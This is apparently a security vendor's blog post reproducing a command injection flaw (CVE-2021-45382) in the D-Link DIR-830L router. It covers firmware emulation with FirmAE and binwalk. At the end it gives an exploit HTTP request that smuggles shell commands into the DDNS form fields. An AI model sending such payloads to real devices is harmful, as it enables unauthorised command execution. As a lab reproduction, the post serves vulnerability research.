D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于美创 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯安全研究

热门阅读

每周安全速递³⁶⁷ | ShinyHunters 开发新型勒索软件ShinySp1d3r

2025-11-21

数安标杆｜美创荣登2025中国准独角兽企业100强

2025-11-17

关注 | 国家标准支撑《网络数据安全管理条例》生效施行（v1.0）

2025-11-12

每周安全速递³⁶⁵ | 研究人员剖析新兴网络犯罪联盟SLH

2025-11-12

美创科技蝉联CNNVD技术支撑单位二级

2025-11-12

每周安全速递³⁶⁷ | ShinyHunters 开发新型勒索软件ShinySp1d3r

2025-11-21

AI大模型+N8N工作流的自动化安全测试流程初探

2025-11-17

每周安全速递³⁶⁶ | Cephalus组织通过RDP部署勒索软件

2025-11-17

每周安全速递³⁶⁵ | 研究人员剖析新兴网络犯罪联盟SLH

2025-11-12

每周安全速递³⁶⁴ | Qilin勒索组织利用Linux载荷和BYOVD入侵

2025-10-31

D-Link DIR-830L 路由器命令执行漏洞（CVE-2021-45382）复现

发布时间：2023-06-30 阅读次数： 1211 次

环境搭建

1.FirmAE 工具安装

首先拉取FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE

运行下载脚本

```
cd FirmAE/
./download.sh
```

运行./install.sh进行安装

2.下载固件

本文模拟的是设备型号为D-Link DIR-830L

下载地址:

https://legacy.us.dlink.com/pages/product.aspx?id=f5e0c0a1975a46bab0b5f38b22c5087b

下载后得到DIR830LA1_FW100B07.bin固件文件

3.FirmAE工具初始化

在FirmAE工具目录下执行./init.sh进行初始化

4.安装binwalk

这里使用FirmAE工具目录下的binwalk安装程序进行安装

cd binwalk-2.3.3/
python3 setup.py install

5.模拟运行固件

执行如下命令对固件进行解压

binwalk -Me /root/DIR830LA1_FW100B07.bin --run-as=root

执行如下命令来模拟运行固件

sudo ./run.sh -r DIR-830 /root/DIR830LA1_FW100B07.bin

使用浏览器访问

http://192.168.0.1

漏洞复现

Exp如下：

POST /ddns_check.ccp 
HTTP/1.1Host: 192.168.0.1
User-Agent:Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 102
Origin: http://192.168.0.1
Connection: close
Cookie: uid=YnnCDFxmJY # 认证信息，此漏洞需要认证
ccp_act=doCheck&ddnsHostName=;ls />/www/1.html;&ddnsUsername=;ls />/www/1.html;&ddnsPassword=123123123